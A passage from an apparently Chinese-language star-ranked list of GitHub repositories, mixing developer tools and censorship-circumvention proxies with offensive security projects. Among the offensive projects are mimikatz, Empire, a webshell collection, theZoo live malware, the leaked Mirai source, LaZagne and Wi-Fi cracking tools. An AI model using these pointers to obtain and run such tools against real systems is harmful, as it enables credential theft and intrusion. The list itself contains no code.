[Shell] [alex000kim/nsfw_data_scraper](https://github.com/alex000kim/nsfw_data_scraper) Collection of scripts to aggregate image data for the purposes of training an NSFW Image Classifier\n- [**10034**星][10d] [Shell] [xdissent/ievms](https://github.com/xdissent/ievms) 自动安装的微软IE应用程序Compat虚拟机\n- [**10030**星][3m] [imthenachoman/how-to-secure-a-linux-server](https://github.com/imthenachoman/how-to-secure-a-linux-server) 一个不断发展的如何保护Linux服务器的指南\n- [**9894**星][10d] [JS] [localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) 向世界公开您的本地主机,以方便测试和共享\n- [**9795**星][10d] [C] [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) 从内存中提取明文密码、散列、PIN码和kerberos票据。pass-the-hash, pass-the-ticket 或构建Golden tickets\n- [**9781**星][10d] [Py] [openai/baselines](https://github.com/openai/baselines) 强化学习算法的高质量实现\n- [**9716**星][10d] [Py] [jhao104/proxy_pool](https://github.com/jhao104/proxy_pool) Python爬虫代理IP池\n- [**9682**星][10d] [Py] [sovereign/sovereign](https://github.com/sovereign/sovereign) 一套Ansible剧本来建立和维护自己的私有云:电子邮件,日历,联系人,文件同步,IRC保镖,VPN,和更多\n- [**9657**星][4m] [ObjC] [gnachman/iterm2](https://github.com/gnachman/iterm2) 一个Mac OS X的终端模拟器,它可以做很多令人惊奇的事情\n- [**9649**星][3m] [C++] [arendst/tasmota](https://github.com/arendst/Tasmota) 支持ESP8266的备选固件,使用webUI、OTA更新、使用计时器或规则的自动化、可扩展性和对MQTT、HTTP、串行或KNX的完全本地控制\n- [**9553**星][3m] [PS] [lukesampson/scoop](https://github.com/lukesampson/scoop) 从命令行以最小的摩擦安装程序\n- [**9536**星][4m] [Java] [ibotpeaches/apktool](https://github.com/ibotpeaches/apktool) 逆向Android apk文件\n- [**9536**星][10d] [C++] [google/tink](https://github.com/google/tink) 轻量级加密库,能够安全、简单、简洁、快速的完成一些普通加密任务\n- [**9528**星][4m] [C#] [icsharpcode/ilspy](https://github.com/icsharpcode/ilspy) .NET反编译器,支持PDB生成,ReadyToRun,元数据(及更多)-跨平台!\n- [**9434**星][4m] [C++] [yuzu-emu/yuzu](https://github.com/yuzu-emu/yuzu) 任天堂Switch模拟器\n- [**9397**星][10d] [C++] [shiqiyu/libfacedetection](https://github.com/shiqiyu/libfacedetection) 图像中的人脸检测\n- [**9355**星][10d] [JS] [qrohlf/trianglify](https://github.com/qrohlf/trianglify) 生成漂亮的SVG背景图像\n- [**9323**星][10d] [Py] [waditu/tushare](https://github.com/waditu/tushare) 一个抓取中国股票历史数据的工具\n- [**9293**星][7d] [microsoft/wsl](https://github.com/microsoft/WSL) Issues found on WSL\n- [**9168**星][8m] [vitalysim/awesome-hacking-resources](https://github.com/vitalysim/awesome-hacking-resources) A collection of hacking / penetration testing resources to make you better!\n- [**9071**星][4m] [Java] [android-hacker/virtualxposed](https://github.com/android-hacker/virtualxposed) 无需Root使用xposed,解锁Bootloader或修改系统映像等\n- [**8948**星][7d] [Java] [code4craft/webmagic](https://github.com/code4craft/webmagic) A scalable web crawler framework for Java.\n- [**8885**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试\n- [**8884**星][10d] [Go] [rkt/rkt](https://github.com/rkt/rkt) [Project ended] rkt is a pod-native container engine for Linux. It is composable, secure, and built on standards.\n- [**8763**星][10d] [Go] [snail007/goproxy](https://github.com/snail007/goproxy) golang实现的高性能http,https,websocket,tcp,socks5代理服务器,支持内网穿透,链式代理,通讯加密,智能HTTP,SOCKS5代理,黑白名单,限速,限流量,限连接数,跨平台,KCP支持,认证API。\n- [**8739**星][2m] [Jupyter Notebook] [google/dopamine](https://github.com/google/dopamine) 增强学习算法快速原型化的研究框架。\n- [**8725**星][7d] [brannondorsey/wifi-cracking](https://github.com/brannondorsey/wifi-cracking) 破解WPA/WPA2 Wi-Fi 路由器\n- [**8634**星][7d] [Swift] [yanue/v2rayu](https://github.com/yanue/v2rayu) V2rayU,基于v2ray核心的mac版客户端,用于科学上网,使用swift编写,支持vmess,shadowsocks,socks5等服务协议,支持订阅, 支持二维码,剪贴板导入,手动配置,二维码分享等\n- [**8606**星][10d] [C] [irungentoo/toxcore](https://github.com/irungentoo/toxcore) 即时通讯,支持所有主流平台\n- [**8500**星][10d] [Java] [java-decompiler/jd-gui](https://github.com/java-decompiler/jd-gui) 一个独立的Java反编译GUI\n- [**8454**星][10d] [JS] [netflix/pollyjs](https://github.com/netflix/pollyjs) 独立的、与框架无关的JavaScript库,支持对HTTP交互进行记录、回放和存根处理\n- [**8394**星][10d] [Py] [shengqiangzhang/examples-of-web-crawlers](https://github.com/shengqiangzhang/examples-of-web-crawlers) 一些非常有趣的python爬虫例子,对新手比较友好,主要爬取淘宝、天猫、微信、豆瓣、QQ等网站\n- [**8265**星][3m] [Shell] [retropie/retropie-setup](https://github.com/retropie/retropie-setup) Shell脚本,设置树莓派/Odroid/PC与复古模拟器和各种核心\n- [**8203**星][10d] [Py] [facebook/chisel](https://github.com/facebook/chisel) Chisel is a collection of LLDB commands to assist debugging iOS apps.\n- [**8159**星][3m] [Jupyter Notebook] [atsushisakai/pythonrobotics](https://github.com/atsushisakai/pythonrobotics) Python sample codes for robotics algorithms.\n- [**8143**星][5m] [JS] [gchq/cyberchef](https://github.com/gchq/cyberchef) 网络瑞士军刀-一个用于加密,编码,压缩和数据分析的网络应用程序\n- [**8123**星][3m] [trimstray/the-practical-linux-hardening-guide](https://github.com/trimstray/the-practical-linux-hardening-guide) 指南详细介绍了如何创建安全的Linux生产系统。\n- [**8097**星][5m] [JS] [microsoft/chakracore](https://github.com/microsoft/chakracore) 支持Microsoft Edge的Chakra JavaScript引擎的核心部分\n- [**8074**星][10d] [ObjC] [shadowsocks/shadowsocks-ios](https://github.com/shadowsocks/shadowsocks-ios) Removed according to regulations.\n- [**8064**星][10d] [Go] [cyfdecyf/cow](https://github.com/cyfdecyf/cow) 用Go编写的HTTP代理。COW可以自动识别被屏蔽的网站,并使用父代理进行访问\n- [**8053**星][5m] [Py] [mailpile/mailpile](https://github.com/mailpile/mailpile) 电子邮件客户端,用户友好的加密和隐私功能\n- [**7973**星][10d] [Go] [sqshq/sampler](https://github.com/sqshq/sampler) 用于shell命令执行、可视化和警报的工具。配置了一个简单的YAML文件\n- [**7967**星][10d] [Py] [threat9/routersploit](https://github.com/threat9/routersploit) 嵌入式设备漏洞利用框架\n- [**7900**星][11d] [PHP] [friendsofphp/goutte](https://github.com/friendsofphp/goutte) Goutte, a simple PHP Web Scraper\n- [**7899**星][10d] [acdlite/react-fiber-architecture](https://github.com/acdlite/react-fiber-architecture) 介绍了React的新核心算法React Fiber\n- [**7886**星][4m] [Go] [git-lfs/git-lfs](https://github.com/git-lfs/git-lfs) Git extension for versioning large files\n- [**7760**星][1y] [Java] [didi/virtualapk](https://github.com/didi/virtualapk) 一个强大的轻量级Android插件框架\n- [**7718**星][11d] [Py] [scrapinghub/portia](https://github.com/scrapinghub/portia) 以可视方式使用Scrapy爬取web\n- [**7714**星][10d] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具\n- [**7673**星][10d] [C++] [keepassxreboot/keepassxc](https://github.com/keepassxreboot/keepassxc) KeePassXC is a cross-platform community-driven port of the Windows application “Keepass Password Safe”.\n- [**7667**星][10d] [Go] [nats-io/nats-server](https://github.com/nats-io/nats-server) 用于NATS的高性能服务器,云本地消息系统。\n- [**7608**星][5m] [Py] [s0md3v/xsstrike](https://github.com/s0md3v/XSStrike) 最先进的XSS扫描仪\n- [**7601**星][10d] [Shell] [etherdream/jsproxy](https://github.com/etherdream/jsproxy) 一个基于浏览器端 JS 实现的在线代理\n- [**7577**星][4m] [Swift] [krzyzanowskim/cryptoswift](https://github.com/krzyzanowskim/cryptoswift) 越来越多的标准和安全的加密算法在Swift中实现\n- [**7573**星][10d] [Shell] [awslabs/git-secrets](https://github.com/awslabs/git-secrets) 防止您将机密和凭据提交到git存储库\n- [**7546**星][7m] [C++] [shadowsocks/shadowsocks-qt5](https://github.com/shadowsocks/shadowsocks-qt5) 跨平台的shadowsocks GUI客户端\n- [**7484**星][11d] [Java] [pxb1988/dex2jar](https://github.com/pxb1988/dex2jar) 用于处理android .dex和java .class文件的工具\n- [**7461**星][7d] [Go] [future-architect/vuls](https://github.com/future-architect/vuls) 针对Linux/FreeBSD 编写的漏洞扫描器. Go 语言编写\n- [**7434**星][5m] [Java] [lionsoul2014/ip2region](https://github.com/lionsoul2014/ip2region) 一个离线IP位置库,其准确率为99.9%,搜索性能为0.0x毫秒。数据库文件小于5Mb,包含所有IP地址均\n- [**7419**星][3m] [C++] [coatisoftware/sourcetrail](https://github.com/coatisoftware/sourcetrail) Sourcetrail - free and open-source interactive source explorer\n- [**7408**星][10d] [Py] [clips/pattern](https://github.com/clips/pattern) Web mining module for Python, with tools for scraping, natural language processing, machine learning, network analysis and visualization.\n- [**7401**星][10d] [Shell] [teddysun/shadowsocks_install](https://github.com/teddysun/shadowsocks_install) 自动安装Shadowsocks服务器。CentOS/Debian/Ubuntu\n- [**7368**星][7m] [Shell] [kholia/osx-kvm](https://github.com/kholia/osx-kvm) 在QEMU/KVM上运行macOS。\n- [**7335**星][8d] [Java] [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy) 在开发和测试Web App时自动发现安全漏洞\n- [**7319**星][10d] [JS] [cs01/gdbgui](https://github.com/cs01/gdbgui) 基于浏览器gdb前端\n- [**7305**星][11d] [tayllan/awesome-algorithms](https://github.com/tayllan/awesome-algorithms) A curated list of awesome places to learn and/or practice algorithms.\n- [**7294**星][10d] [Py] [networkx/networkx](https://github.com/networkx/networkx) 用于创建、操纵和研究复杂网络的结构,Python包\n- [**7249**星][10d] [TS] [peers/peerjs](https://github.com/peers/peerjs) 完整的、可配置的、易于使用的基于WebRTC的P2P API,支持数据通道和媒体流。\n- [**7240**星][10d] [Go] [bettercap/bettercap](https://github.com/bettercap/bettercap) 用于802.11、BLE和以太网的瑞士军刀,侦察和MITM攻击\n- [**7203**星][10d] [Rust] [denisidoro/navi](https://github.com/denisidoro/navi) An interactive cheatsheet tool for the command-line and application launchers\n- [**7095**星][10d] [Shell] [cisofy/lynis](https://github.com/cisofy/lynis) 用于Linux、macOS和基于unix的系统的安全审计工具\n- [**7075**星][8d] [greatfire/wiki](https://github.com/greatfire/wiki) (自由浏览)直接点击就能畅快浏览谷歌、推特、脸书\n- [**7053**星][4m] [Py] [h2y/shadowrocket-adblock-rules](https://github.com/h2y/shadowrocket-adblock-rules) 提供多款 Shadowrocket 规则,带广告过滤功能。用于 iOS 未越狱设备选择性地自动翻墙。\n- [**7004**星][10d] [C++] [radareorg/cutter](https://github.com/radareorg/cutter) 逆向框架 radare2的Qt界面,iaito的升级版\n- [**6973**星][7d] [JS] [avwo/whistle](https://github.com/avwo/whistle) 基于Node实现的跨平台抓包调试代理工具(HTTP, HTTP2, HTTPS, Websocket)\n- [**6904**星][1y] [Java] [amitshekhariitbhu/android-debug-database](https://github.com/amitshekhariitbhu/android-debug-database) 一个用于调试android数据库和共享首选项的库\n- [**6897**星][7d] [PS] [powershellmafia/powersploit](https://github.com/PowerShellMafia/PowerSploit) 一组Microsoft PowerShell模块,可用于在评估的所有阶段帮助渗透测试人员\n- [**6891**星][10d] [Py] [seatgeek/fuzzywuzzy](https://github.com/seatgeek/fuzzywuzzy) Python中的模糊字符串匹配\n- [**6868**星][10d] [PHP] [guyueyingmu/avbook](https://github.com/guyueyingmu/avbook) AV 电影管理系统, avmoo , javbus , javlibrary 爬虫,线上 AV 影片图书馆,AV 磁力链接数据库\n- [**6733**星][10d] [Go] [casbin/casbin](https://github.com/casbin/casbin) 一个授权库,支持访问控制模型,如ACL, RBAC, ABAC在Golang\n- [**6730**星][3m] [C++] [marlinfirmware/marlin](https://github.com/marlinfirmware/marlin) 基于Arduino平台的RepRap 3D打印机优化固件\n- [**6701**星][3y] [C++] [alibaba/andfix](https://github.com/alibaba/andfix) 为Android应用提供热修复的库。\n- [**6655**星][10d] [Go] [shadowsocks/shadowsocks-go](https://github.com/shadowsocks/shadowsocks-go) go port of shadowsocks (Deprecated)\n- [**6605**星][2y] [Jupyter Notebook] [coells/100days](https://github.com/coells/100days) 加密100天(100个练习)\n- [**6596**星][10d] [Go] [quay/clair](https://github.com/quay/clair) Vulnerability Static Analysis for Containers\n- [**6596**星][10d] [Go] [quay/clair](https://github.com/quay/clair) 容器(appc、docker)漏洞静态分析工具。\n- [**6589**星][10d] [C] [qmk/qmk_firmware](https://github.com/qmk/qmk_firmware) 开源键盘固件Atmel AVR和Arm USB家族\n- [**6581**星][10d] [shadowsocksrr/shadowsocksr-android](https://github.com/shadowsocksrr/shadowsocksr-android) A ShadowsocksR client for Android\n- [**6572**星][10d] [C] [spacehuhntech/esp8266_deauther](https://github.com/SpacehuhnTech/esp8266_deauther) 使用ESP8266 制作Wifi干扰器\n- [**6555**星][10d] [jeffgerickson/algorithms](https://github.com/jeffgerickson/algorithms) Bug-tracking for Jeff's algorithms book, notes, etc.\n- [**6533**星][10d] [Py] [gallopsled/pwntools](https://github.com/gallopsled/pwntools) CTF框架+漏洞开发库\n- [**6523**星][10d] [Roff] [max2max/freess](https://github.com/max2max/freess) 免费ss账号 免费shadowsocks账号 免费v2ray账号 (长期更新)\n- [**6507**星][7d] [HTML] [open-power-workgroup/hospital](https://github.com/open-power-workgroup/hospital) OpenPower工作组收集汇总的医院开放数据\n- [**6469**星][10d] [Py] [mlflow/mlflow](https://github.com/mlflow/mlflow) 机器学习生命周期\n- [**6468**星][3m] [C] [softethervpn/softethervpn](https://github.com/softethervpn/softethervpn) Cross-platform multi-protocol VPN software. Pull requests are welcome. The stable version is available at\n- [**6461**星][10d] [Go] [usefathom/fathom](https://github.com/usefathom/fathom) 一个更简单、更注重隐私的谷歌分析的替代品。\n- [**6453**星][10d] [ASP] [hq450/fancyss](https://github.com/hq450/fancyss) 用于asuswrt/merlin/openwrt为基础的,带软件中心固件路由器的科学上网\n- [**6451**星][10d] [Py] [asciimoo/searx](https://github.com/asciimoo/searx) 网络元数据搜索引擎。汇总70 多个搜索引擎的搜素结果,避免用户被追踪或者被分析。可与 Tor 结合使用\n- [**6433**星][10d] [Py] [cyrus-and/gdb-dashboard](https://github.com/cyrus-and/gdb-dashboard) Python中用于GDB的模块化可视化界面\n- [**6407**星][1y] [stascorp/rdpwrap](https://github.com/stascorp/rdpwrap) RDP包装器库\n- [**6398**星][12d] [Go] [henrylee2cn/pholcus](https://github.com/henrylee2cn/pholcus) 是一款用户只需编写采集规则的高并发分布式爬虫软件, 支持单机、服务端、客户端三种运行模式,拥有Web、GUI、命令行三种操作界面\n- [**6397**星][11d] [rmerl/asuswrt-merlin](https://github.com/rmerl/asuswrt-merlin) 华硕路由器固件(Asuswrt)的增强版(旧版代码库)\n- [**6393**星][10d] [Py] [yandex/gixy](https://github.com/yandex/gixy) Nginx 配置静态分析工具,防止配置错误导致安全问题,自动化错误配置检测\n- [**6365**星][10d] [Py] [the-art-of-hacking/h4cker](https://github.com/The-Art-of-Hacking/h4cker) 资源收集:hacking、渗透、数字取证、事件响应、漏洞研究、漏洞开发、逆向\n- [**6364**星][12m] [JS] [haotian-wang/google-access-helper](https://github.com/haotian-wang/google-access-helper) 谷歌访问助手破解版\n- [**6357**星][2m] [JS] [alibaba/anyproxy](https://github.com/alibaba/anyproxy) NodeJS中完全可配置的http/https代理\n- [**6352**星][4m] [TS] [chimurai/http-proxy-middleware](https://github.com/chimurai/http-proxy-middleware) js代理变得很简单。轻松配置代理中间件,支持连接、表达、浏览器同步等功能\n- [**6340**星][11d] [Java] [google/android-classyshark](https://github.com/google/android-classyshark) 分析基于Android/Java的App或游戏\n- [**6298**星][10d] [Java] [qihoo360/replugin](https://github.com/qihoo360/replugin) RePlugin - A flexible, stable, easy-to-use Android Plug-in Framework\n- [**6284**星][4m] [C#] [unity-technologies/unitycsreference](https://github.com/unity-technologies/unitycsreference) Unity c#参考源代码\n- [**6265**星][5m] [Java] [droidpluginteam/droidplugin](https://github.com/droidpluginteam/droidplugin) android上的插件框架,运行任何第三方apk,无需安装、修改或重新打包\n- [**6262**星][10d] [C++] [dolphin-emu/dolphin](https://github.com/dolphin-emu/dolphin) 一个GameCube / Wii模拟器,可以让你在PC上玩这两个平台的游戏。\n- [**6260**星][10d] [ObjC] [johnno1962/injectionforxcode](https://github.com/johnno1962/injectionforxcode) Runtime Code Injection for Objective-C & Swift\n- [**6252**星][6m] [Py] [s0md3v/photon](https://github.com/s0md3v/Photon) 用于OSINT的超快速爬虫,爬取时提取以下信息:URL、文件、邮件、社交账户、Amazon Bucket、密钥、JS文件与终端、符合自定义正则的字符串、子域名、DNS相关数据\n- [**6246**星][10d] [Py] [schollz/howmanypeoplearearound](https://github.com/schollz/howmanypeoplearearound) 监控 Wifi 信号统计你周围的人数\n- [**6244**星][10d] [JS] [mgechev/javascript-algorithms](https://github.com/mgechev/javascript-algorithms) \n- [**6239**星][10d] [Go] [inlets/inlets](https://github.com/inlets/inlets) 结合反向代理和websocket隧道,通过一个出口节点将您的内部和开发端点暴露给公共Internet\n- [**6189**星][2y] [Hack] [facebook/fbctf](https://github.com/facebook/fbctf) 托管CTF比赛的平台\n- [**6171**星][6m] [berzerk0/probable-wordlists](https://github.com/berzerk0/probable-wordlists) Version 2 is live! Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!\n- [**6155**星][10d] [C] [rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.\n- [**6146**星][10d] [Go] [crawlab-team/crawlab](https://github.com/crawlab-team/crawlab) Distributed web crawler admin platform for spiders management regardless of languages and frameworks. 分布式爬虫管理平台,支持任何语言和框架\n- [**6144**星][10d] [JS] [swagger-api/swagger-editor](https://github.com/swagger-api/swagger-editor) 在浏览器内编辑YAML中的Swagger API规范,并实时预览文档\n- [**6142**星][3y] [C] [jgamblin/mirai-source-code](https://github.com/jgamblin/mirai-source-code) 研究/IoC开发目的而泄露的Mirai源代码\n- [**6103**星][10d] [Py] [refirmlabs/binwalk](https://github.com/ReFirmLabs/binwalk) 固件分析工具(命令行+IDA插件)\n - [IDA插件](https://github.com/ReFirmLabs/binwalk/tree/master/src/scripts) \n - [binwalk](https://github.com/ReFirmLabs/binwalk/tree/master/src/binwalk) \n- [**6100**星][10d] [rshipp/awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis) A curated list of awesome malware analysis tools and resources.\n- [**6088**星][10d] [JS] [sindresorhus/fkill-cli](https://github.com/sindresorhus/fkill-cli) 难以置信地杀死进程\n- [**6083**星][10d] [C] [xoreaxeaxeax/movfuscator](https://github.com/xoreaxeaxeax/movfuscator) C编译器,编译的二进制文件只有1个代码块。\n- [**6034**星][10d] [Gnuplot] [nasa-jpl/open-source-rover](https://github.com/nasa-jpl/open-source-rover) A build-it-yourself, 6-wheel rover based on the rovers on Mars!\n- [**6027**星][10d] [C] [nodemcu/nodemcu-firmware](https://github.com/nodemcu/nodemcu-firmware) 基于Lua的交互式固件,适用于ESP8266、ESP8285和ESP32\n- [**6008**星][7d] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) 一个自动化的、一体化的移动应用程序(Android/iOS/Windows)渗透测试、恶意软件分析和安全评估框架,能够执行静态和动态分析\n- [**5998**星][10d] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.\n- [**5987**星][2y] [qinyuhang/shadowsocksx-ng-r](https://github.com/qinyuhang/shadowsocksx-ng-r) Next Generation of ShadowsocksX\n- [**5966**星][8m] [Py] [luyishisi/anti-anti-spider](https://github.com/luyishisi/anti-anti-spider) 越来越多的网站具有反爬虫特性,有的用图片隐藏关键数据,有的使用反人类的验证码,建立反反爬虫的代码仓库,通过与不同特性的网站做斗争(无恶意)提高技术。\n- [**5961**星][7d] [Shell] [vulhub/vulhub](https://github.com/vulhub/vulhub) 基于Docker-Compose的预构建Vulnerable环境\n- [**5956**星][10d] [Py] [kivy/python-for-android](https://github.com/kivy/python-for-android) 将您的Python应用程序转换为Android APK\n- [**5950**星][10d] [Go] [dnscrypt/dnscrypt-proxy](https://github.com/DNSCrypt/dnscrypt-proxy) 灵活的DNS代理,支持现代的加密DNS协议,例如:DNS protocols such as DNSCrypt v2, DNS-over-HTTPS and Anonymized DNSCrypt.\n- [**5911**星][4m] [JS] [wix/detox](https://github.com/wix/detox) 移动应用端到端测试和自动化框架\n- [**5848**星][11d] [Py] [newsapps/beeswithmachineguns](https://github.com/newsapps/beeswithmachineguns) 创建多个micro EC2实例, 攻击指定Web App\n- [**5825**星][2m] [carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) Hacking教程、工具和资源\n- [**5814**星][10d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册\n- [**5785**星][8m] [ObjC] [square/ponydebugger](https://github.com/square/ponydebugger) 远程网络和数据调试为您的原生iOS应用程序使用Chrome开发工具\n- [**5784**星][10d] [Java] [guardianproject/haven](https://github.com/guardianproject/haven) 通过Android应用和设备上的传感器保护自己的个人空间和财产而又不损害\n- [**5758**星][10d] [Py] [ytisf/thezoo](https://github.com/ytisf/thezoo) A repository of LIVE malwares for your own joy and pleasure.\n- [**5742**星][11d] [Ruby] [presidentbeef/brakeman](https://github.com/presidentbeef/brakeman) RoR程序的静态分析工具\n- [**5738**星][10d] [Py] [axi0mx/ipwndfu](https://github.com/axi0mx/ipwndfu) 许多iOS设备的开源越狱工具\n- [**5702**星][2y] [JS] [liftoff/gateone](https://github.com/liftoff/gateone) 一个html5支持的终端模拟器和SSH客户端\n- [**5627**星][10d] [Go] [ginuerzh/gost](https://github.com/ginuerzh/gost) GO语言实现的安全隧道\n- [**5624**星][10d] [Java] [thingsboard/thingsboard](https://github.com/thingsboard/thingsboard) Open-source IoT Platform - Device management, data collection, processing and visualization.\n- [**5624**星][10d] [hq450/fancyss_history_package](https://github.com/hq450/fancyss_history_package) 科学上网插件的离线安装包储存在这里\n- [**5613**星][10d] [sbilly/awesome-security](https://github.com/sbilly/awesome-security) 与安全相关的软件、库、文档、书籍、资源和工具等收集\n- [**5604**星][10d] [Shell] [kylemanna/docker-openvpn](https://github.com/kylemanna/docker-openvpn) 一个带有EasyRSA PKI CA的Docker容器\n- [**5582**星][10d] [Go] [jetstack/cert-manager](https://github.com/jetstack/cert-manager) 在Kubernetes自动提供和管理TLS证书\n- [**5545**星][10d] [Py] [awslabs/aws-shell](https://github.com/awslabs/aws-shell) 与AWS CLI一起工作的集成Shell\n- [**5524**星][10d] [Shell] [foxlet/macos-simple-kvm](https://github.com/foxlet/macos-simple-kvm) Tools to set up a quick macOS VM in QEMU, accelerated by KVM.\n- [**5523**星][4m] [Go] [zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) 审计git repo的秘密\n- [**5504**星][11d] [TS] [jigsaw-code/outline-client](https://github.com/jigsaw-code/outline-client) 使用流行的Shadowsocks协议,并依靠Cordova和Electron框架来支持Windows、Android / ChromeOS、Linux、iOS和macOS\n- [**5443**星][10d] [Go] [slackhq/nebula](https://github.com/slackhq/nebula) A scalable overlay networking tool with a focus on performance, simplicity and security\n- [**5439**星][11m] [C] [pwn20wndstuff/undecimus](https://github.com/pwn20wndstuff/undecimus) 为iOS 11.0 - 12.4的unc0ver越狱\n- [**5424**星][10d] [Rust] [autumnai/leaf](https://github.com/autumnai/leaf) 为黑客开放的机器智能框架。(GPU / CPU)\n- [**5415**星][10d] [C] [upx/upx](https://github.com/upx/upx) 可执行文件的终极加壳程序\n- [**5405**星][10d] [Py] [shadowsocksr-backup/shadowsocksr](https://github.com/shadowsocksr-backup/shadowsocksr) ShadowsocksR的Python版本\n- [**5380**星][10d] [Py] [bregman-arie/devops-exercises](https://github.com/bregman-arie/devops-exercises) Linux, Jenkins, AWS, SRE, Prometheus, Docker, Python, Ansible, Git, Kubernetes, Terraform, OpenStack, SQL, NoSQL, Azure, GCP, DNS, Elastic, Network, Virtualization\n- [**5378**星][7d] [Java] [meituan-dianping/walle](https://github.com/meituan-dianping/walle) Android Signature V2 Scheme签名下的新一代渠道包打包神器\n- [**5377**星][7d] [PS] [empireproject/empire](https://github.com/EmpireProject/Empire) 后渗透框架. Windows客户端用PowerShell, Linux/OSX用Python. 之前PowerShell Empire和Python EmPyre的组合\n- [**5376**星][10d] [JS] [bda-research/node-crawler](https://github.com/bda-research/node-crawler) Web Crawler/Spider for NodeJS + server-side jQuery ;-)\n- [**5374**星][10d] [Py] [manisso/fsociety](https://github.com/manisso/fsociety) 渗透测试框架\n- [**5366**星][10d] [Makefile] [frida/frida](https://github.com/frida/frida) 面向开发人员、逆向工程师和安全研究人员的动态插桩工具包\n- [**5346**星][2y] [Py] [xiyoumc/webhubbot](https://github.com/xiyoumc/webhubbot) 学习Scrapy Spider框架和MongoDB数据库,\n- [**5321**星][10d] [Py] [sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) 透明的代理服务器,作为穷人的VPN。用 ssh转发。不需要管理。适用于Linux和MacOS。支持DNS隧道\n- [**5299**星][4m] [PHP] [tennc/webshell](https://github.com/tennc/webshell) webshell收集\n- [**5273**星][10d] [Py] [evilsocket/opensnitch](https://github.com/evilsocket/opensnitch) Little Snitch 应用程序防火墙的 GNU/Linux 版本。(Little Snitch:Mac操作系统的应用程序防火墙,能防止应用程序在你不知道的情况下自动访问网络)\n- [**5266**星][10d] [Shell] [stackexchange/blackbox](https://github.com/stackexchange/blackbox) 文件使用PGP加密后隐藏在Git/Mercurial/Subversion\n- [**5265**星][4m] [Py] [n1nj4sec/pupy](https://github.com/n1nj4sec/pupy) Python编写的远控、后渗透工具,跨平台(Windows, Linux, OSX, Android)\n- [**5263**星][4m] [ObjC] [macpass/macpass](https://github.com/MacPass/MacPass) A native OS X KeePass client\n- [**5249**星][10d] [C] [offensive-security/exploitdb](https://github.com/offensive-security/exploitdb) 官方Exploit Database存储库\n- [**5236**星][7d] [Py] [injetlee/python](https://github.com/injetlee/python) Python脚本。模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机\n- [**5229**星][10d] [Go] [cloudflare/cfssl](https://github.com/cloudflare/cfssl) Cloudflare的PKI和TLS工具包\n- [**5227**星][4m] [Py] [usarmyresearchlab/dshell](https://github.com/usarmyresearchlab/dshell) 可扩展的网络取证分析框架。支持快速开发插件,以支持剖析网络数据包捕获。\n- [**5224**星][11d] [Rust] [sharkdp/hexyl](https://github.com/sharkdp/hexyl) 命令行中查看hex\n- [**5224**星][1y] [JS] [samyk/poisontap](https://github.com/samyk/poisontap) 使用USB攻击上锁的/密码保护的电脑,释放基于WebSocket的后门,暴露内部路由器,使用树莓派和Node.js窃取Cookies\n- [**5209**星][3m] [C++] [avast/retdec](https://github.com/avast/retdec) 基于 LLVM 的可重定位机器码反编译器, 可检测壳、检测和重构C++类继承、重构函数/类型/结构体等、可反编译为 C 或 Python 2种高级语言格式\n- [**5209**星][10d] [Go] [gcla/termshark](https://github.com/gcla/termshark) tshark的终端UI,灵感来自Wireshark\n- [**5201**星][10d] [Py] [secdev/scapy](https://github.com/secdev/scapy) 交互式数据包操作, Python, 命令行+库\n- [**5142**星][7m] [Lua] [alexazhou/verynginx](https://github.com/alexazhou/verynginx) 一个非常强大和友好的基于lua-nginx模块(openresty)的nginx,它提供WAF、控制面板和仪表板。\n- [**5140**星][8d] [Py] [snare/voltron](https://github.com/snare/voltron) 用于黑客的hacky调试器UI\n- [**5136**星][10d] [Shell] [nginx-proxy/docker-letsencrypt-nginx-proxy-companion](https://github.com/nginx-proxy/docker-letsencrypt-nginx-proxy-companion) LetsEncrypt companion container for nginx-proxy\n- [**5094**星][4m] [Py] [trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) 来自TrustedSec的社会工程师工具包(SET)存储库\n- [**4999**星][10d] [Py] [twintproject/twint](https://github.com/twintproject/twint) 不使用Twitter的API,绕过API限制,抓取用户的关注者,关注者,推文等\n- [**4998**星][10d] [TS] [apis-guru/graphql-voyager](https://github.com/apis-guru/graphql-voyager) 将任何GraphQL API表示为交互式图形。\n- [**4992**星][11d] [Go] [yinghuocho/firefly-proxy](https://github.com/yinghuocho/firefly-proxy) 帮助绕过GFW的代理软件。\n- [**4987**星][10d] [JS] [beefproject/beef](https://github.com/beefproject/beef) 浏览器漏洞开发框架项目\n- [**4982**星][7d] [C++] [thealgorithms/c-plus-plus](https://github.com/thealgorithms/c-plus-plus) All Algorithms implemented in C++\n- [**4979**星][5m] [Py] [alessandroz/lazagne](https://github.com/alessandroz/lazagne) 检索大量存储在本地计算机上的密码\n- [**4967**星][3m] [C] [google/oss-fuzz](https://github.com/google/oss-fuzz) 对开源软件进行持续性fuzzing\n- [**4957**星][10d] [C] [lz4/lz4](https://github.com/lz4/lz4) 极快压缩算法\n- [**4952**星][10d] [C++] [facebook/redex](https://github.com/facebook/redex) Android App字节码优化器\n- [**4949**星][11d] [Go] [bitly/oauth2_proxy](https://github.com/bitly/oauth2_proxy) 反向代理,静态文件服务器,提供Providers(Google/Github)认证\n- [**4948**星][7d] [C++] 